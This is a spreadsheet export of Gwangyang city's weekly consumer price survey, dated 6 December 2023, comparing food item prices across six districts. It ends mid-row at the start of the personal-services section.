Workbook

Sheet 총괄
A1: `
A2: 주 간 물 가 조 사 표 (광 양 시 총 괄)
A3: 조사일 : 2023. 12. 06.
A4: 연번 | B4: 품목 | C4: 규격·단위 | D4: 카운트 | F4: 평 균 | J4: 가격동향(광양읍1) | M4: 가격동향(광양읍2) | P4: 가격동향(중마동1) | S4: 가격동향(중마동2) | V4: 가격동향(광영) | Y4: 가격동향(금호)
D5: 전주 | E5: 금주 | F5: 전주 | G5: 금주 | H5: 증감액 | I5: 증감율 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 전주 | N5: 금주 | O5: 증감액 | P5: 전주 | Q5: 금주 | R5: 증감액 | S5: 전주 | T5: 금주 | U5: 증감액 | V5: 전주 | W5: 금주 | X5: 증감액 | Y5: 전주 | Z5: 금주 | AA5: 증감액
A6: 농·축·수산물(26개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(풍광수토) | D7: =COUNTIF(J7,"<>0")+COUNTIF(M7,"<>0")+COUNTIF(P7,"<>0")+COUNTIF(S7,"<>0")+COUNTIF(V7,"<>0")+COUNTIF(Y7,"<>0") -> 6 | E7: =COUNTIF(K7,"<>0")+COUNTIF(N7,"<>0")+COUNTIF(Q7,"<>0")+COUNTIF(T7,"<>0")+COUNTIF(W7,"<>0")+COUNTIF(Z7,"<>0") -> 6 | F7: =IF(D7=0,0,SUM(J7,M7,P7,S7,V7,Y7)/D7) -> 60,725 | G7: =IF(E7=0,0,SUM(K7,N7,Q7,T7,W7,Z7)/E7) -> 60,467 | H7: =SUM(G7-F7) -> -258 | I7: =IF(F7=0,0,((G7-F7)/F7)) -> -0 | J7: =광양읍1!F7 -> 60,750 | K7: =광양읍1!G7 -> 60,750 | L7: =광양읍1!H7 -> 0 | M7: =광양읍2!F7 -> 60,500 | N7: =광양읍2!G7 -> 60,500 | O7: =광양읍2!H7 -> 0 | P7: =중마동1!F7 -> 61,950 | Q7: =중마동1!G7 -> 61,950 | R7: =중마동1!H7 -> 0 | S7: =중마동2!F7 -> 61,450 | T7: =중마동2!G7 -> 59,900 | U7: =중마동2!H7 -> -1,550 | V7: =광영동!F7 -> 57,800 | W7: =광영동!G7 -> 57,800 | X7: =광영동!H7 -> 0 | Y7: =금호동!F7 -> 61,900 | Z7: =금호동!G7 -> 61,900 | AA7: =금호동!H7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(M8,"<>0")+COUNTIF(P8,"<>0")+COUNTIF(S8,"<>0")+COUNTIF(V8,"<>0")+COUNTIF(Y8,"<>0") -> 6 | E8: =COUNTIF(K8,"<>0")+COUNTIF(N8,"<>0")+COUNTIF(Q8,"<>0")+COUNTIF(T8,"<>0")+COUNTIF(W8,"<>0")+COUNTIF(Z8,"<>0") -> 6 | F8: =IF(D8=0,0,SUM(J8,M8,P8,S8,V8,Y8)/D8) -> 1,345 | G8: =IF(E8=0,0,SUM(K8,N8,Q8,T8,W8,Z8)/E8) -> 1,322 | H8: =SUM(G8-F8) -> -23 | I8: =IF(F8=0,0,((G8-F8)/F8)) -> -0 | J8: =광양읍1!F8 -> 885 | K8: =광양읍1!G8 -> 1,107 | L8: =광양읍1!H8 -> 222.5 | M8: =광양읍2!F8 -> 1,950 | N8: =광양읍2!G8 -> 2,250 | O8: =광양읍2!H8 -> 300 | P8: =중마동1!F8 -> 673 | Q8: =중마동1!G8 -> 648 | R8: =중마동1!H8 -> -25 | S8: =중마동2!F8 -> 1,800 | T8: =중마동2!G8 -> 1,850 | U8: =중마동2!H8 -> 50 | V8: =광영동!F8 -> 1,300 | W8: =광영동!G8 -> 1,000 | X8: 0 | Y8: =금호동!F8 -> 1,465 | Z8: =금호동!G8 -> 1,080 | AA8: =금호동!H8 -> -385 | AE8: (
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 6 | E9: 6 | F9: 6,644 | G9: 6,793 | H9: =SUM(G9-F9) -> 149 | I9: =IF(F9=0,0,((G9-F9)/F9)) -> 0 | J9: =광양읍1!F9 -> 6,639 | K9: =광양읍1!G9 -> 6,349 | L9: =광양읍1!H9 -> -290.5 | M9: =광양읍2!F9 -> 7,250 | N9: =광양읍2!G9 -> 6,750 | O9: =광양읍2!H9 -> -500 | P9: =중마동1!F9 -> 8,650 | Q9: =중마동1!G9 -> 6,710 | R9: =중마동1!H9 -> -1,940 | S9: =중마동2!F9 -> 6,950 | T9: =중마동2!G9 -> 9,950 | U9: =중마동2!H9 -> 3,000 | V9: =광영동!F9 -> 5,500 | W9: =광영동!G9 -> 5,500 | X9: =광영동!H9 -> 0 | Y9: =금호동!F9 -> 4,875 | Z9: =금호동!G9 -> 5,500 | AA9: =금호동!H9 -> 625
A10: 4 | B10: 양상추 | C10: 상품1개(500g) | D10: 6 | E10: 6 | F10: 2,753 | G10: 2,709 | H10: =SUM(G10-F10) -> -44 | I10: =IF(F10=0,0,((G10-F10)/F10)) -> -0 | J10: =광양읍1!F10 -> 1,925 | K10: =광양읍1!G10 -> 2,002 | L10: =광양읍1!H10 -> 77 | M10: =광양읍2!F10 -> 3,050 | N10: =광양읍2!G10 -> 3,050 | O10: =광양읍2!H10 -> 0 | P10: =중마동1!F10 -> 2,485 | Q10: =중마동1!G10 -> 2,745 | R10: =중마동1!H10 -> 260 | S10: =중마동2!F10 -> 2,000 | T10: =중마동2!G10 -> 1,800 | U10: =중마동2!H10 -> -200 | V10: =광영동!F10 -> 2,400 | W10: =광영동!G10 -> 2,400 | X10: =광영동!H10 -> 0 | Y10: =금호동!F10 -> 4,659 | Z10: =금호동!G10 -> 4,259 | AA10: =금호동!H10 -> -400
A11: 5 | B11: 애호박 | C11: 상품1개(250~300g) | D11: 6 | E11: 6 | F11: 1,802 | G11: 1,739 | H11: =SUM(G11-F11) -> -63 | I11: =IF(F11=0,0,((G11-F11)/F11)) -> -0 | J11: =광양읍1!F11 -> 1,545 | K11: =광양읍1!G11 -> 1,545 | L11: =광양읍1!H11 -> 0 | M11: =광양읍2!F11 -> 2,400 | N11: =광양읍2!G11 -> 2,400 | O11: =광양읍2!H11 -> 0 | P11: =중마동1!F11 -> 1,735 | Q11: =중마동1!G11 -> 1,645 | R11: =중마동1!H11 -> -90 | S11: =중마동2!F11 -> 2,190 | T11: =중마동2!G11 -> 1,690 | U11: =중마동2!H11 -> -500 | V11: =광영동!F11 -> 1,550 | W11: =광영동!G11 -> 1,550 | X11: 0 | Y11: =금호동!F11 -> 1,390 | Z11: =금호동!G11 -> 1,605 | AA11: =금호동!H11 -> 215
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: =COUNTIF(J12,"<>0")+COUNTIF(M12,"<>0")+COUNTIF(P12,"<>0")+COUNTIF(S12,"<>0")+COUNTIF(V12,"<>0")+COUNTIF(Y12,"<>0") -> 6 | E12: =COUNTIF(K12,"<>0")+COUNTIF(N12,"<>0")+COUNTIF(Q12,"<>0")+COUNTIF(T12,"<>0")+COUNTIF(W12,"<>0")+COUNTIF(Z12,"<>0") -> 5 | F12: 12,849 | G12: 15,013 | H12: =SUM(G12-F12) -> 2,164 | I12: =IF(F12=0,0,((G12-F12)/F12)) -> 0 | J12: =광양읍1!F12 -> 9,149 | K12: =광양읍1!G12 -> 9,149 | L12: =광양읍1!H12 -> 0 | M12: =광양읍2!F12 -> 9,400 | N12: =광양읍2!G12 -> 9,400 | O12: =광양읍2!H12 -> 0 | P12: =중마동1!F12 -> 13,125 | Q12: =중마동1!G12 -> 19,598 | R12: =중마동1!H12 -> 6,473 | S12: =중마동2!F12 -> 17,000 | T12: =중마동2!G12 -> 17,000 | U12: =중마동2!H12 -> 0 | V12: =광영동!F12 -> 8,500 | W12: =광영동!G12 -> 0 | X12: =광영동!H12 -> -8,500 | Y12: =금호동!F12 -> 19,920 | Z12: =금호동!G12 -> 19,920 | AA12: =금호동!H12 -> 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 6 | E13: 6 | F13: 3,084 | G13: 3,117 | H13: 33 | I13: 0 | J13: =광양읍1!F13 -> 3,345 | K13: =광양읍1!G13 -> 3,345 | L13: =광양읍1!H13 -> 0 | M13: =광양읍2!F13 -> 3,700 | N13: =광양읍2!G13 -> 3,700 | O13: =광양읍2!H13 -> 0 | P13: =중마동1!F13 -> 4,350 | Q13: =중마동1!G13 -> 4,350 | R13: =중마동1!H13 -> 0 | S13: =중마동2!F13 -> 2,875 | T13: =중마동2!G13 -> 2,990 | U13: =중마동2!H13 -> 115 | V13: =광영동!F13 -> 1,990 | W13: =광영동!G13 -> 1,990 | X13: =광영동!H13 -> 0 | Y13: =금호동!F13 -> 2,245 | Z13: =금호동!G13 -> 2,325 | AA13: =금호동!H13 -> 80
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 6 | E14: 6 | F14: =IF(D14=0,0,SUM(J14,M14,P14,S14,V14,Y14)/D14) -> 4,734 | G14: 4,584 | H14: -150 | I14: -0 | J14: =광양읍1!F14 -> 4,418 | K14: =광양읍1!G14 -> 4,343 | L14: =광양읍1!H14 -> -75 | M14: =광양읍2!F14 -> 4,875 | N14: =광양읍2!G14 -> 5,175 | O14: =광양읍2!H14 -> 300 | P14: =중마동1!F14 -> 5,945 | Q14: =중마동1!G14 -> 3,995 | R14: =중마동1!H14 -> -1,950 | S14: =중마동2!F14 -> 5,175 | T14: =중마동2!G14 -> 4,425 | U14: =중마동2!H14 -> -750 | V14: =광영동!F14 -> 3,750 | W14: =광영동!G14 -> 5,550 | X14: =광영동!H14 -> 1,800 | Y14: =금호동!F14 -> 4,240 | Z14: =금호동!G14 -> 4,015 | AA14: =금호동!H14 -> -225
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 6 | E15: 6 | F15: 12,926 | G15: 12,137 | H15: -788 | I15: -0 | J15: =광양읍1!F15 -> 12,804 | K15: =광양읍1!G15 -> 12,804 | L15: =광양읍1!H15 -> 0 | M15: =광양읍2!F15 -> 14,250 | N15: =광양읍2!G15 -> 12,500 | O15: =광양읍2!H15 -> -1,750 | P15: =중마동1!F15 -> 12,350 | Q15: =중마동1!G15 -> 11,135 | R15: =중마동1!H15 -> -1,215 | S15: =중마동2!F15 -> 12,750 | T15: =중마동2!G15 -> 11,000 | U15: =중마동2!H15 -> -1,750 | V15: =광영동!F15 -> 8,950 | W15: =광영동!G15 -> 8,950 | X15: =광영동!H15 -> 0 | Y15: =금호동!F15 -> 16,450 | Z15: =금호동!G15 -> 16,435 | AA15: =금호동!H15 -> -15
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 6 | E16: 6 | F16: 11,140 | G16: =IF(E16=0,0,SUM(K16,N16,Q16,T16,W16,Z16)/E16) -> 10,890 | H16: -250 | I16: -0 | J16: =광양읍1!F16 -> 8,895 | K16: =광양읍1!G16 -> 8,395 | L16: =광양읍1!H16 -> -500 | M16: =광양읍2!F16 -> 13,000 | N16: =광양읍2!G16 -> 13,000 | O16: =광양읍2!H16 -> 0 | P16: =중마동1!F16 -> 8,445 | Q16: =중마동1!G16 -> 8,445 | R16: =중마동1!H16 -> 0 | S16: =중마동2!F16 -> 9,400 | T16: =중마동2!G16 -> 9,400 | U16: =중마동2!H16 -> 0 | V16: =광영동!F16 -> 8,950 | W16: =광영동!G16 -> 7,950 | X16: =광영동!H16 -> -1,000 | Y16: =금호동!F16 -> 18,150 | Z16: =금호동!G16 -> 18,150 | AA16: =금호동!H16 -> 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 6 | E17: 6 | F17: 3,922 | G17: 3,899 | H17: -23 | I17: -0 | J17: =광양읍1!F17 -> 4,600 | K17: =광양읍1!G17 -> 4,300 | L17: =광양읍1!H17 -> -300 | M17: =광양읍2!F17 -> 4,750 | N17: =광양읍2!G17 -> 4,500 | O17: =광양읍2!H17 -> -250 | P17: =중마동1!F17 -> 3,620 | Q17: =중마동1!G17 -> 3,620 | R17: =중마동1!H17 -> 0 | S17: =중마동2!F17 -> 3,750 | T17: =중마동2!G17 -> 3,650 | U17: =중마동2!H17 -> -100 | V17: =광영동!F17 -> 3,450 | W17: =광영동!G17 -> 3,450 | X17: =광영동!H17 -> 0 | Y17: =금호동!F17 -> 3,360 | Z17: =금호동!G17 -> 3,875 | AA17: =금호동!H17 -> 515
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 6 | E18: 6 | F18: 3,356 | G18: 3,300 | H18: -56 | I18: -0 | J18: =광양읍1!F18 -> 3,000 | K18: =광양읍1!G18 -> 3,000 | L18: =광양읍1!H18 -> 0 | M18: =광양읍2!F18 -> 3,500 | N18: =광양읍2!G18 -> 3,000 | O18: =광양읍2!H18 -> -500 | P18: =중마동1!F18 -> 2,845 | Q18: =중마동1!G18 -> 3,095 | R18: =중마동1!H18 -> 250 | S18: =중마동2!F18 -> 3,540 | T18: =중마동2!G18 -> 3,540 | U18: =중마동2!H18 -> 0 | V18: =광영동!F18 -> 3,500 | W18: =광영동!G18 -> 3,500 | X18: =광영동!H18 -> 0 | Y18: =금호동!F18 -> 3,750 | Z18: =금호동!G18 -> 3,665 | AA18: =금호동!H18 -> -85
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: =COUNTIF(J19,"<>0")+COUNTIF(M19,"<>0")+COUNTIF(P19,"<>0")+COUNTIF(S19,"<>0")+COUNTIF(V19,"<>0")+COUNTIF(Y19,"<>0") -> 6 | E19: =COUNTIF(K19,"<>0")+COUNTIF(N19,"<>0")+COUNTIF(Q19,"<>0")+COUNTIF(T19,"<>0")+COUNTIF(W19,"<>0")+COUNTIF(Z19,"<>0") -> 6 | F19: 1,994 | G19: 1,991 | H19: -3 | I19: -0 | J19: =광양읍1!F19 -> 2,158 | K19: =광양읍1!G19 -> 2,158 | L19: =광양읍1!H19 -> 0 | M19: =광양읍2!F19 -> 2,000 | N19: =광양읍2!G19 -> 2,000 | O19: =광양읍2!H19 -> 0 | P19: =중마동1!F19 -> 2,165 | Q19: =중마동1!G19 -> 2,150 | R19: =중마동1!H19 -> -15 | S19: =중마동2!F19 -> 1,650 | T19: =중마동2!G19 -> 1,650 | U19: =중마동2!H19 -> 0 | V19: =광영동!F19 -> 1,490 | W19: =광영동!G19 -> 1,490 | X19: =광영동!H19 -> 0 | Y19: =금호동!F19 -> 2,500 | Z19: =금호동!G19 -> 2,500 | AA19: =금호동!H19 -> 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: =COUNTIF(J20,"<>0")+COUNTIF(M20,"<>0")+COUNTIF(P20,"<>0")+COUNTIF(S20,"<>0")+COUNTIF(V20,"<>0")+COUNTIF(Y20,"<>0") -> 6 | E20: =COUNTIF(K20,"<>0")+COUNTIF(N20,"<>0")+COUNTIF(Q20,"<>0")+COUNTIF(T20,"<>0")+COUNTIF(W20,"<>0")+COUNTIF(Z20,"<>0") -> 6 | F20: 3,543 | G20: 4,025 | H20: 482 | I20: 0 | J20: =광양읍1!F20 -> 4,150 | K20: =광양읍1!G20 -> 4,150 | L20: =광양읍1!H20 -> 0 | M20: =광양읍2!F20 -> 3,250 | N20: =광양읍2!G20 -> 3,625 | O20: =광양읍2!H20 -> 375 | P20: =중마동1!F20 -> 2,031 | Q20: =중마동1!G20 -> 4,374 | R20: =중마동1!H20 -> 2,343 | S20: =중마동2!F20 -> 3,375 | T20: =중마동2!G20 -> 3,550 | U20: =중마동2!H20 -> 175 | V20: =광영동!F20 -> 4,950 | W20: =광영동!G20 -> 4,950 | X20: =광영동!H20 -> 0 | Y20: =금호동!F20 -> 3,500 | Z20: =금호동!G20 -> 3,500 | AA20: =금호동!H20 -> 0
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 6 | E21: 6 | F21: 3,994 | G21: 3,953 | H21: -42 | I21: -0 | J21: =광양읍1!F21 -> 4,750 | K21: =광양읍1!G21 -> 4,500 | L21: =광양읍1!H21 -> -250 | M21: =광양읍2!F21 -> 3,775 | N21: =광양읍2!G21 -> 3,400 | O21: =광양읍2!H21 -> -375 | P21: =중마동1!F21 -> 4,000 | Q21: =중마동1!G21 -> 4,375 | R21: =중마동1!H21 -> 375 | S21: =중마동2!F21 -> 3,000 | T21: =중마동2!G21 -> 3,000 | U21: =중마동2!H21 -> 0 | V21: =광영동!F21 -> 4,450 | W21: =광영동!G21 -> 4,450 | X21: =광영동!H21 -> 0 | Y21: =금호동!F21 -> 3,990 | Z21: =금호동!G21 -> 3,990 | AA21: =금호동!H21 -> 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 6 | E22: 6 | F22: 4,138 | G22: 4,032 | H22: -106 | I22: -0 | J22: =광양읍1!F22 -> 3,093 | K22: =광양읍1!G22 -> 2,752 | L22: =광양읍1!H22 -> -341 | M22: =광양읍2!F22 -> 3,900 | N22: =광양읍2!G22 -> 3,900 | O22: =광양읍2!H22 -> 0 | P22: =중마동1!F22 -> 4,870 | Q22: =중마동1!G22 -> 4,870 | R22: =중마동1!H22 -> 0 | S22: =중마동2!F22 -> 4,050 | T22: =중마동2!G22 -> 4,105 | U22: =중마동2!H22 -> 55 | V22: =광영동!F22 -> 4,250 | W22: =광영동!G22 -> 4,250 | X22: =광영동!H22 -> 0 | Y22: =금호동!F22 -> 4,665 | Z22: =금호동!G22 -> 4,315 | AA22: =금호동!H22 -> -350
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 6 | E23: 6 | F23: 66,445 | G23: 64,795 | H23: -1,650 | I23: -0 | J23: =광양읍1!F23 -> 70,500 | K23: =광양읍1!G23 -> 70,500 | L23: =광양읍1!H23 -> 0 | M23: =광양읍2!F23 -> 60,000 | N23: =광양읍2!G23 -> 57,500 | O23: =광양읍2!H23 -> -2,500 | P23: =중마동1!F23 -> 68,670 | Q23: =중마동1!G23 -> 65,670 | R23: =중마동1!H23 -> -3,000 | S23: =중마동2!F23 -> 63,700 | T23: =중마동2!G23 -> 59,400 | U23: =중마동2!H23 -> -4,300 | V23: =광영동!F23 -> 52,500 | W23: =광영동!G23 -> 47,400 | X23: =광영동!H23 -> -5,100 | Y23: =금호동!F23 -> 83,301 | Z23: =금호동!G23 -> 88,299 | AA23: =금호동!H23 -> 4,998
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: =COUNTIF(J24,"<>0")+COUNTIF(M24,"<>0")+COUNTIF(P24,"<>0")+COUNTIF(S24,"<>0")+COUNTIF(V24,"<>0")+COUNTIF(Y24,"<>0") -> 5 | E24: =COUNTIF(K24,"<>0")+COUNTIF(N24,"<>0")+COUNTIF(Q24,"<>0")+COUNTIF(T24,"<>0")+COUNTIF(W24,"<>0")+COUNTIF(Z24,"<>0") -> 5 | F24: 24,140 | G24: 23,740 | H24: -400 | I24: -0 | J24: =광양읍1!F24 -> 0 | K24: =광양읍1!G24 -> 0 | L24: =광양읍1!H24 -> 0 | M24: =광양읍2!F24 -> 27,900 | N24: =광양읍2!G24 -> 27,900 | O24: =광양읍2!H24 -> 0 | P24: =중마동1!F24 -> 22,200 | Q24: =중마동1!G24 -> 22,200 | R24: =중마동1!H24 -> 0 | S24: =중마동2!F24 -> 13,000 | T24: =중마동2!G24 -> 13,000 | U24: =중마동2!H24 -> 0 | V24: =광영동!F24 -> 30,000 | W24: =광영동!G24 -> 30,000 | X24: =광영동!H24 -> 0 | Y24: =금호동!F24 -> 27,600 | Z24: =금호동!G24 -> 25,602 | AA24: =금호동!H24 -> -1,998
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 6 | E25: 6 | F25: 15,853 | G25: 16,406 | H25: 552 | I25: 0 | J25: =광양읍1!F25 -> 14,850 | K25: =광양읍1!G25 -> 14,850 | L25: =광양읍1!H25 -> 0 | M25: =광양읍2!F25 -> 16,750 | N25: =광양읍2!G25 -> 16,150 | O25: =광양읍2!H25 -> -600 | P25: =중마동1!F25 -> 19,110 | Q25: =중마동1!G25 -> 22,275 | R25: =중마동1!H25 -> 3,165 | S25: =중마동2!F25 -> 13,690 | T25: =중마동2!G25 -> 14,590 | U25: =중마동2!H25 -> 900 | V25: =광영동!F25 -> 13,440 | W25: =광영동!G25 -> 13,440 | X25: =광영동!H25 -> 0 | Y25: =금호동!F25 -> 17,280 | Z25: =금호동!G25 -> 17,130 | AA25: =금호동!H25 -> -150
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 6 | E26: 6 | F26: 8,221 | G26: 8,104 | H26: -117 | I26: -0 | J26: =광양읍1!F26 -> 7,350 | K26: =광양읍1!G26 -> 7,350 | L26: =광양읍1!H26 -> 0 | M26: =광양읍2!F26 -> 8,300 | N26: =광양읍2!G26 -> 8,250 | O26: =광양읍2!H26 -> -50 | P26: =중마동1!F26 -> 7,995 | Q26: =중마동1!G26 -> 7,895 | R26: =중마동1!H26 -> -100 | S26: =중마동2!F26 -> 7,750 | T26: =중마동2!G26 -> 7,950 | U26: =중마동2!H26 -> 200 | V26: =광영동!F26 -> 8,000 | W26: =광영동!G26 -> 7,250 | X26: =광영동!H26 -> -750 | Y26: =금호동!F26 -> 9,930 | Z26: =금호동!G26 -> 9,930 | AA26: =금호동!H26 -> 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: =COUNTIF(J27,"<>0")+COUNTIF(M27,"<>0")+COUNTIF(P27,"<>0")+COUNTIF(S27,"<>0")+COUNTIF(V27,"<>0")+COUNTIF(Y27,"<>0") -> 6 | E27: 6 | F27: 8,046 | G27: 8,046 | H27: 0 | I27: 0 | J27: =광양읍1!F27 -> 6,940 | K27: =광양읍1!G27 -> 6,940 | L27: =광양읍1!H27 -> 0 | M27: =광양읍2!F27 -> 8,400 | N27: =광양읍2!G27 -> 8,400 | O27: =광양읍2!H27 -> 0 | P27: =중마동1!F27 -> 7,795 | Q27: =중마동1!G27 -> 7,795 | R27: =중마동1!H27 -> 0 | S27: =중마동2!F27 -> 8,300 | T27: =중마동2!G27 -> 8,300 | U27: =중마동2!H27 -> 0 | V27: =광영동!F27 -> 8,050 | W27: =광영동!G27 -> 8,050 | X27: =광영동!H27 -> 0 | Y27: =금호동!F27 -> 8,790 | Z27: =금호동!G27 -> 8,790 | AA27: =금호동!H27 -> 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 5 | E28: 5 | F28: 2,292 | G28: 2,292 | H28: 0 | I28: 0 | J28: =광양읍1!F28 -> 1,466 | K28: =광양읍1!G28 -> 1,466 | L28: =광양읍1!H28 -> 0 | M28: =광양읍2!F28 -> 2,750 | N28: =광양읍2!G28 -> 2,750 | O28: =광양읍2!H28 -> 0 | P28: =중마동1!F28 -> 3,000 | Q28: =중마동1!G28 -> 3,000 | R28: =중마동1!H28 -> 0 | S28: =중마동2!F28 -> 1,244 | T28: =중마동2!G28 -> 1,244 | U28: =중마동2!H28 -> 0 | V28: =광영동!F28 -> 3,000 | W28: =광영동!G28 -> 3,000 | X28: =광영동!H28 -> 0 | Y28: =금호동!F28 -> 0 | Z28: =금호동!G28 -> 0 | AA28: =금호동!H28 -> 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 6 | E29: 6 | F29: 8,481 | G29: 8,837 | H29: =SUM(G29-F29) -> 356 | I29: 0 | J29: =광양읍1!F29 -> 7,500 | K29: =광양읍1!G29 -> 7,000 | L29: =광양읍1!H29 -> -500 | M29: =광양읍2!F29 -> 11,500 | N29: =광양읍2!G29 -> 11,500 | O29: =광양읍2!H29 -> 0 | P29: =중마동1!F29 -> 9,700 | Q29: =중마동1!G29 -> 11,900 | R29: =중마동1!H29 -> 2,200 | S29: =중마동2!F29 -> 15,250 | T29: =중마동2!G29 -> 14,250 | U29: =중마동2!H29 -> -1,000 | V29: =광영동!F29 -> 4,975 | W29: =광영동!G29 -> 4,950 | X29: =광영동!H29 -> -25 | Y29: =금호동!F29 -> 1,960 | Z29: =금호동!G29 -> 3,420 | AA29: =금호동!H29 -> 1,460
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 5 | E30: 5 | F30: 4,090 | G30: =IF(E30=0,0,SUM(K30,N30,Q30,T30,W30,Z30)/E30) -> 4,088 | H30: =SUM(G30-F30) -> -2 | I30: =IF(F30=0,0,((G30-F30)/F30)) -> -0 | J30: =광양읍1!F30 -> 3,800 | K30: =광양읍1!G30 -> 3,800 | L30: =광양읍1!H30 -> 0 | M30: =광양읍2!F30 -> 4,700 | N30: =광양읍2!G30 -> 4,700 | O30: =광양읍2!H30 -> 0 | P30: =중마동1!F30 -> 4,250 | Q30: =중마동1!G30 -> 3,740 | R30: =중마동1!H30 -> -510 | S30: =중마동2!F30 -> 4,450 | T30: =중마동2!G30 -> 4,950 | U30: =중마동2!H30 -> 500 | V30: =광영동!F30 -> 3,250 | W30: =광영동!G30 -> 3,250 | X30: =광영동!H30 -> 0 | Y30: =금호동!F30 -> 0 | Z30: =금호동!G30 -> 0 | AA30: =금호동!H30 -> 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 6 | E31: 6 | F31: 3,617 | G31: 3,873 | H31: 257 | I31: 0 | J31: =광양읍1!F31 -> 2,000 | K31: =광양읍1!G31 -> 2,800 | L31: =광양읍1!H31 -> 800 | M31: =광양읍2!F31 -> 4,550 | N31: =광양읍2!G31 -> 4,550 | O31: =광양읍2!H31 -> 0 | P31: =중마동1!F31 -> 2,750 | Q31: =중마동1!G31 -> 2,950 | R31: =중마동1!H31 -> 200 | S31: =중마동2!F31 -> 4,900 | T31: =중마동2!G31 -> 4,900 | U31: =중마동2!H31 -> 0 | V31: =광영동!F31 -> 2,700 | W31: =광영동!G31 -> 3,240 | X31: =광영동!H31 -> 540 | Y31: =금호동!F31 -> 4,800 | Z31: =금호동!G31 -> 4,800 | AA31: =금호동!H31 -> 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 6 | E32: 6 | F32: 5,017 | G32: 4,795 | H32: -222 | I32: -0 | J32: =광양읍1!F32 -> 5,000 | K32: =광양읍1!G32 -> 4,700 | L32: =광양읍1!H32 -> -300 | M32: =광양읍2!F32 -> 4,700 | N32: =광양읍2!G32 -> 4,700 | O32: =광양읍2!H32 -> 0 | P32: =중마동1!F32 -> 5,700 | Q32: =중마동1!G32 -> 5,700 | R32: =중마동1!H32 -> 0 | S32: =중마동2!F32 -> 6,800 | T32: =중마동2!G32 -> 6,800 | U32: =중마동2!H32 -> 0 | V32: =광영동!F32 -> 4,950 | W32: =광영동!G32 -> 4,950 | X32: =광영동!H32 -> 0 | Y32: =금호동!F32 -> 2,950 | Z32: =금호동!G32 -> 1,920 | AA32: =금호동!H32 -> -1,030
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 5 | E33: 5 | F33: 10,002 | G33: 10,002 | H33: 0 | I33: 0 | J33: =광양읍1!F33 -> 10,000 | K33: =광양읍1!G33 -> 10,000 | L33: =광양읍1!H33 -> 0 | M33: =광양읍2!F33 -> 0 | N33: =광양읍2!G33 -> 0 | O33: =광양읍2!H33 -> 0 | P33: =중마동1!F33 -> 4,680 | Q33: =중마동1!G33 -> 4,680 | R33: =중마동1!H33 -> 0 | S33: =중마동2!F33 -> 11,900 | T33: =중마동2!G33 -> 11,900 | U33: =중마동2!H33 -> 0 | V33: =광영동!F33 -> 8,320 | W33: =광영동!G33 -> 8,320 | X33: =광영동!H33 -> 0 | Y33: =금호동!F33 -> 15,110 | Z33: =금호동!G33 -> 15,110 | AA33: =금호동!H33 -> 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: =COUNTIF(J34,"<>0")+COUNTIF(M34,"<>0")+COUNTIF(P34,"<>0")+COUNTIF(S34,"<>0")+COUNTIF(V34,"<>0")+COUNTIF(Y34,"<>0") -> 5 | E34: =COUNTIF(K34,"<>0")+COUNTIF(N34,"<>0")+COUNTIF(Q34,"<>0")+COUNTIF(T34,"<>0")+COUNTIF(W34,"<>0")+COUNTIF(Z34,"<>0") -> 5 | F34: 107,520 | G34: 109,380 | H34: 1,860 | I34: 0 | J34: =광양읍1!F34 -> 90,150 | K34: =광양읍1!G34 -> 99,450 | L34: =광양읍1!H34 -> 9,300 | M34: =광양읍2!F34 -> 0 | N34: =광양읍2!G34 -> 0 | O34: =광양읍2!H34 -> 0 | P34: =중마동1!F34 -> 93,900 | Q34: =중마동1!G34 -> 93,900 | R34: =중마동1!H34 -> 0 | S34: =중마동2!F34 -> 81,250 | T34: =중마동2!G34 -> 81,250 | U34: =중마동2!H34 -> 0 | V34: =광영동!F34 -> 95,300 | W34: =광영동!G34 -> 95,300 | X34: =광영동!H34 -> 0 | Y34: =금호동!F34 -> 177,000 | Z34: =금호동!G34 -> 177,000 | AA34: =금호동!H34 -> 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(M36,"<>0")+COUNTIF(P36,"<>0")+COUNTIF(S36,"<>0")+COUNTIF(V36,"<>0")+COUNTIF(Y36,"<>0") -> 6 | E36: =COUNTIF(K36,"<>0")+COUNTIF(N36,"<>0")+COUNTIF(Q36,"<>0")+COUNTIF(T36,"<>0")+COUNTIF(W36,"<>0")+COUNTIF(Z36,"<>0") -> 6 | F36: 9,667 | G36: 9,667 | H36: 0 | I36: 0 | J36: =광양읍1!F36 -> 9,500 | K36: =광양읍1!G36 -> 9,500 | L36: 0 | M36: =광양읍2!F36 -> 9,000 | N36: =광양읍2!G36 -> 9,000 | O36: 0 | P36: =중마동1!F36 -> 10,500 | Q36: =중마동1!G36 -> 10,500 | R36: 0 | S36: =중마동2!F36 -> 10,000 | T36: =중마동2!G36 -> 10,000 | U36: 0 | V36: =광영동!F36 -> 9,000 | W36: =광영동!G36 -> 9,000 | X36: 0 | Y36: 